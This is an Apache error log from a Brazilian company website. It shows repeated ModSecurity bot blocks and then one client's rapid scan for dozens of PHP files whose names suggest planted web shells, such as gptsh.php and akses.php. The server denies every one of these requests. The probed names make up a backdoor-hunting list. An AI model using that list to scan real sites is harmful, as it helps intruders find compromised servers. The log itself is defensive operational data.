[Mon Mar 16 03:13:31.185158 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] [client 69.197.179.242:33130] AH01067: Failed to read FastCGI header, referer: https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809
[Mon Mar 16 03:13:31.185175 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (104)Connection reset by peer: [client 69.197.179.242:33130] AH01075: Error dispatching request to : , referer: https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809
[Mon Mar 16 03:13:31.190388 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] [client 179.188.53.243:37324] AH01067: Failed to read FastCGI header
[Mon Mar 16 03:13:31.190423 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (104)Connection reset by peer: [client 179.188.53.243:37324] AH01075: Error dispatching request to : 
[Mon Mar 16 03:16:27.043640 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.228.16:45364] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abegO5qj1wV0Si-Okee9cwAAAA0"]
[Mon Mar 16 03:16:53.608392 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.244.31:47626] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abegVXbQATo66fKoS7wfRwAAAMs"]
[Mon Mar 16 03:21:49.122820 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.228.16:55606] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abehfZqj1wV0Si-Okee9qgAAAAE"]
[Mon Mar 16 03:22:17.086365 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.244.31:36604] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abehmZqj1wV0Si-Okee9qwAAABU"]
[Mon Mar 16 03:26:53.456773 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.228.16:34034] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeirY6lpbStxTqkSktBpwAAAko"]
[Mon Mar 16 03:32:11.003709 2026] [:error] [pid 21533:tid 140411548894976] [client 74.7.228.16:44152] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abej63jZBu2q05ozVU8oaQAAAVc"]
[Mon Mar 16 03:32:50.595105 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.244.31:57432] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abekEtSswJuvopo3lOg4dgAAAIM"]
[Mon Mar 16 03:37:19.830054 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.228.16:53586] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abelH3jZBu2q05ozVU8orwAAAUU"]
[Mon Mar 16 03:37:56.087966 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.244.31:33016] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abelRHjZBu2q05ozVU8otQAAAVg"]
[Mon Mar 16 03:42:47.976275 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.228.16:60770] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abemZ46lpbStxTqkSktCPwAAAlQ"]
[Mon Mar 16 03:43:19.683153 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.244.31:43480] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abemh9SswJuvopo3lOg5gwAAAIY"]
[Mon Mar 16 03:47:57.990787 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.228.16:38036] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abennY6lpbStxTqkSktCawAAAlY"]
[Mon Mar 16 03:49:28.826788 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.244.31:53350] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aben-HjZBu2q05ozVU8pgwAAAU4"]
[Mon Mar 16 03:53:26.421225 2026] [:error] [pid 21946:tid 140411540502272] [client 74.7.228.16:35054] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeo5nbQATo66fKoS7wgwwAAANg"]
[Mon Mar 16 03:54:36.486917 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.244.31:55686] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abepLAlT9VtDQc7bgUx1rgAAAQY"]
[Mon Mar 16 04:00:04.539472 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.244.31:60352] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeqdNSswJuvopo3lOg6QAAAAIY"]
[Mon Mar 16 04:09:06.110200 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.228.16:38440] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abesknbQATo66fKoS7whpQAAAMw"]
[Mon Mar 16 04:10:36.574849 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.244.31:33726] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abes7Jqj1wV0Si-OkefARgAAAAs"]
[Mon Mar 16 04:14:29.430639 2026] [:error] [pid 11972:tid 140411674785536] [client 74.7.228.16:42796] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abet1Zqj1wV0Si-OkefAbQAAAAg"]
[Mon Mar 16 04:15:47.123005 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.244.31:44652] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeuI9SswJuvopo3lOg60wAAAII"]
[Mon Mar 16 04:19:39.681143 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.228.16:41922] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abevC9SswJuvopo3lOg66gAAAJM"]
[Mon Mar 16 04:21:19.523214 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.244.31:45066] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abevb7ABkC4fWIHEf8HDPQAAAFc"]
[Mon Mar 16 04:25:09.619546 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.228.16:42538] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abewVdSswJuvopo3lOg7DQAAAIw"]
[Mon Mar 16 04:25:51.686148 2026] [mime_magic:error] [pid 21533:tid 140411658000128] (70014)End of file found: [client 82.97.199.54:40113] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Mon Mar 16 04:26:21.935348 2026] [:error] [pid 21533:tid 140411599251200] [client 74.7.244.31:53512] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abewnXjZBu2q05ozVU8sLwAAAVE"]
[Mon Mar 16 04:30:20.402557 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.228.16:48816] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abexjLysWC90G-1nBrAe3QAAAYE"]
[Mon Mar 16 04:35:42.102499 2026] [:error] [pid 10709:tid 140411725141760] [client 74.7.228.16:45832] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abeyzhXjF1vJNtV6CWrTDwAAAcI"]
[Mon Mar 16 04:36:45.209900 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.244.31:52524] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abezDZqj1wV0Si-OkefBkgAAABE"]
[Mon Mar 16 04:40:46.299104 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.228.16:36900] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abez_njZBu2q05ozVU8tsAAAAVg"]
[Mon Mar 16 04:42:06.828071 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.244.31:35666] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abe0Tpqj1wV0Si-OkefBxQAAABA"]
[Mon Mar 16 04:46:13.429344 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.228.16:57530] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abe1RdSswJuvopo3lOg8BAAAAJE"]
[Mon Mar 16 04:47:15.904643 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.244.31:55910] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abe1g9SswJuvopo3lOg8CQAAAII"]
[Mon Mar 16 04:51:21.907401 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.228.16:35032] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abe2eQlT9VtDQc7bgUx4vwAAARg"]
[Mon Mar 16 04:52:37.151965 2026] [:error] [pid 21533:tid 140411607643904] [client 74.7.244.31:53034] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abe2xXjZBu2q05ozVU8uYwAAAVA"]
[Mon Mar 16 04:56:46.331805 2026] [:error] [pid 10709:tid 140411691570944] [client 74.7.228.16:48992] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abe3vhXjF1vJNtV6CWrT7AAAAcY"]
[Mon Mar 16 04:57:44.393367 2026] [:error] [pid 10709:tid 140411624429312] [client 74.7.244.31:46636] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abe3-BXjF1vJNtV6CWrT8wAAAc4"]
[Mon Mar 16 05:03:06.055762 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.244.31:59514] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abe5OtSswJuvopo3lOg8wQAAAJM"]
[Mon Mar 16 05:07:59.007503 2026] [access_compat:error] [pid 32654:tid 140411540502272] [client 20.203.144.43:50740] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/gptsh.php
[Mon Mar 16 05:07:59.205249 2026] [access_compat:error] [pid 32654:tid 140411590858496] [client 20.203.144.43:50740] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wolv.php
[Mon Mar 16 05:07:59.406779 2026] [access_compat:error] [pid 32654:tid 140411683178240] [client 20.203.144.43:50740] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/lock.php
[Mon Mar 16 05:07:59.608281 2026] [access_compat:error] [pid 32654:tid 140411674785536] [client 20.203.144.43:50740] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/edorxrr.php
[Mon Mar 16 05:07:59.809616 2026] [access_compat:error] [pid 32654:tid 140411599251200] [client 20.203.144.43:50740] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/ox.php
[Mon Mar 16 05:08:00.004909 2026] [access_compat:error] [pid 32654:tid 140411699963648] [client 20.203.144.43:50740] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/1754569357_be.php
[Mon Mar 16 05:08:00.204581 2026] [access_compat:error] [pid 32654:tid 140411725141760] [client 20.203.144.43:50740] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-kd4xalrg7m.php
[Mon Mar 16 05:08:00.399930 2026] [access_compat:error] [pid 32654:tid 140411557287680] [client 20.203.144.43:50740] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/hplfuns.php
[Mon Mar 16 05:08:00.600455 2026] [access_compat:error] [pid 32654:tid 140411691570944] [client 20.203.144.43:50740] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/test2.php
[Mon Mar 16 05:08:00.795485 2026] [access_compat:error] [pid 32654:tid 140411565680384] [client 20.203.144.43:50740] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/cah.php
[Mon Mar 16 05:08:00.993882 2026] [access_compat:error] [pid 32654:tid 140411548894976] [client 20.203.144.43:50740] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/boltt.php
[Mon Mar 16 05:08:01.195314 2026] [access_compat:error] [pid 32654:tid 140411574073088] [client 20.203.144.43:50740] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/100.php
[Mon Mar 16 05:08:01.396136 2026] [access_compat:error] [pid 10831:tid 140411683178240] [client 20.203.144.43:50766] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/rand.php
[Mon Mar 16 05:08:01.591009 2026] [access_compat:error] [pid 10831:tid 140411641214720] [client 20.203.144.43:50766] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/randoms.php
[Mon Mar 16 05:08:01.788287 2026] [access_compat:error] [pid 10831:tid 140411699963648] [client 20.203.144.43:50766] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/1998.php
[Mon Mar 16 05:08:01.982470 2026] [access_compat:error] [pid 10831:tid 140411649607424] [client 20.203.144.43:50766] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wtiiy.php
[Mon Mar 16 05:08:02.183267 2026] [access_compat:error] [pid 10831:tid 140411666392832] [client 20.203.144.43:50766] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/sxb.php
[Mon Mar 16 05:08:02.387908 2026] [access_compat:error] [pid 10831:tid 140411557287680] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-mter.php
[Mon Mar 16 05:08:02.584629 2026] [access_compat:error] [pid 10831:tid 140411540502272] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/inege.php
[Mon Mar 16 05:08:02.780339 2026] [access_compat:error] [pid 10831:tid 140411582465792] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/hc.php
[Mon Mar 16 05:08:02.976432 2026] [access_compat:error] [pid 10831:tid 140411632822016] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/aifa.php
[Mon Mar 16 05:08:03.181311 2026] [access_compat:error] [pid 10831:tid 140411658000128] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/awh.php
[Mon Mar 16 05:08:03.377669 2026] [access_compat:error] [pid 10831:tid 140411708356352] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/yussef.php
[Mon Mar 16 05:08:03.572686 2026] [access_compat:error] [pid 10831:tid 140411725141760] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/0771dccd2958b85d48125d146d77e038akc.php
[Mon Mar 16 05:08:03.791001 2026] [access_compat:error] [pid 10831:tid 140411741927168] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/19.php
[Mon Mar 16 05:08:03.986839 2026] [access_compat:error] [pid 10831:tid 140411691570944] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/bb5.php
[Mon Mar 16 05:08:04.191554 2026] [access_compat:error] [pid 10831:tid 140411716749056] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/fe5.php
[Mon Mar 16 05:08:04.387972 2026] [access_compat:error] [pid 10831:tid 140411565680384] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp11.php
[Mon Mar 16 05:08:04.585839 2026] [access_compat:error] [pid 10831:tid 140411624429312] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/file61.php
[Mon Mar 16 05:08:04.781860 2026] [access_compat:error] [pid 10831:tid 140411574073088] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/16.php
[Mon Mar 16 05:08:04.981484 2026] [access_compat:error] [pid 10831:tid 140411641214720] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/bb.php
[Mon Mar 16 05:08:05.179466 2026] [access_compat:error] [pid 10831:tid 140411699963648] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/ss.php
[Mon Mar 16 05:08:05.374864 2026] [access_compat:error] [pid 10831:tid 140411674785536] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/h2.php
[Mon Mar 16 05:08:05.570266 2026] [access_compat:error] [pid 10831:tid 140411649607424] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-p2r3q9c8k4.php
[Mon Mar 16 05:08:05.770476 2026] [access_compat:error] [pid 10831:tid 140411666392832] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/ty.php
[Mon Mar 16 05:08:05.971114 2026] [access_compat:error] [pid 10831:tid 140411548894976] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/albin.php
[Mon Mar 16 05:08:06.169200 2026] [access_compat:error] [pid 10831:tid 140411557287680] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/utky.php
[Mon Mar 16 05:08:06.676581 2026] [access_compat:error] [pid 10831:tid 140411540502272] [client 20.203.144.43:50774] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/settings.php
[Mon Mar 16 05:08:08.114046 2026] [access_compat:error] [pid 10709:tid 140411674785536] [client 20.203.144.43:50800] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/fsgdjkl.php
[Mon Mar 16 05:08:08.312081 2026] [access_compat:error] [pid 10709:tid 140411590858496] [client 20.203.144.43:50800] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/uuu.php
[Mon Mar 16 05:08:08.511760 2026] [access_compat:error] [pid 10709:tid 140411741927168] [client 20.203.144.43:50800] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/by.php
[Mon Mar 16 05:08:08.720459 2026] [access_compat:error] [pid 10709:tid 140411582465792] [client 20.203.144.43:50800] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/sf.php
[Mon Mar 16 05:08:08.916835 2026] [access_compat:error] [pid 10709:tid 140411649607424] [client 20.203.144.43:50800] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/asw.php
[Mon Mar 16 05:08:09.111413 2026] [access_compat:error] [pid 10709:tid 140411666392832] [client 20.203.144.43:50800] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/eee.php
[Mon Mar 16 05:08:09.306562 2026] [access_compat:error] [pid 10709:tid 140411683178240] [client 20.203.144.43:50800] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/lp6.php
[Mon Mar 16 05:08:09.515797 2026] [access_compat:error] [pid 10709:tid 140411699963648] [client 20.203.144.43:50800] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/akses.php
